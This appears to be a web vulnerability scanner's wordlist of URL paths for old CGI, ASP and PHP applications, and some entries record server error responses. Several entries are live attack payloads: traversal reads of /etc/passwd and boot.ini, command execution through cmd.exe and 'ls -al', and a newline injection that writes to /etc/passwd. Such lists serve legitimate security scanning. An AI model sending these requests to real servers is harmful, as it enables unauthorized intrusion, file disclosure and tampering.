/rubrique.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=c:\\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
/screen.php
/scripts/tradecli.dll
/scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir
/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
/Site/biztalkhttpreceive.dll
/site_searcher.cgi
/spelling.php3+
/squirrelmail/src/read_body.php
/staticpages/index.php
/status.php3
/supporter/index.php
/supporter/tupdate.php
/sw000.asp?|-|0|404_Object_Not_Found
/syslog.htm?%20
/technote/print.cgi
/texis/websearch/phine
/tinymsg.php
/tmp_view.php?file=/etc/passwd
/topic/entete.php
/topsitesdir/edit.php
/ttforum/index.php
/tutos/file/file_new.php
/tutos/file/file_select.php
/typo3/typo3/dev/translations.php
/uifc/MultFileUploadHandler.php+
/upload.cgi+
/url.jsp
/useraction.php3
/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
/utils/sprc.asp+
/vars.inc+
/VBZooM/add-subject.php
/wbboard/profile.php
/wbboard/reply.php
/webcalendar/login.php
/webcalendar/view_m.php
/webmail/lib/emailreader_execute_on_each_page.inc.php
/webmail/src/read_body.php
/web_app/WEB-INF/jrun-web.xml
/web_app/WEB-INF/webapp.properties
/XMBforum/buddy.php
/XMBforum/member.php
/x_stat_admin.php
/yabbse/Reminder.php
/yabbse/Sources/Packages.php
/zentrack/index.php
/_head.php
/cgi-bin/anyboard.cgi
/cgi-bin/auctiondeluxe/auction.pl
/cgi-bin/bb-ack.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/build.cgi
/cgi-bin/cgforum.cgi
/cgi-bin/CSMailto.cgi
/cgi-bin/CSMailto/CSMailto.cgi
/cgi-bin/csNews.cgi
/cgi-bin/csPassword.cgi
/cgi-bin/csPassword/csPassword.cgi
/cgi-bin/cutecast/members/
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/if/admin/nph-build.cgi
/cgi-bin/imageFolio.cgi
/cgi-bin/imagefolio/admin/admin.cgi
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
/cgi-bin/mojo/mojo.cgi
/cgi-bin/non-existent.pl
/cgi-bin/nph-exploitscanget.cgi
/cgi-bin/parse-file
/cgi-bin/quikstore.cfg
/cgi-bin/register.cgi
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/statusconfig.pl
/cgi-bin/sws/manager.pl
/cgi-bin/texis/phine
/cgi-bin/utm/admin
/cgi-bin/utm/utm_stat
/cgi-bin/where.pl?sd=ls%20-al
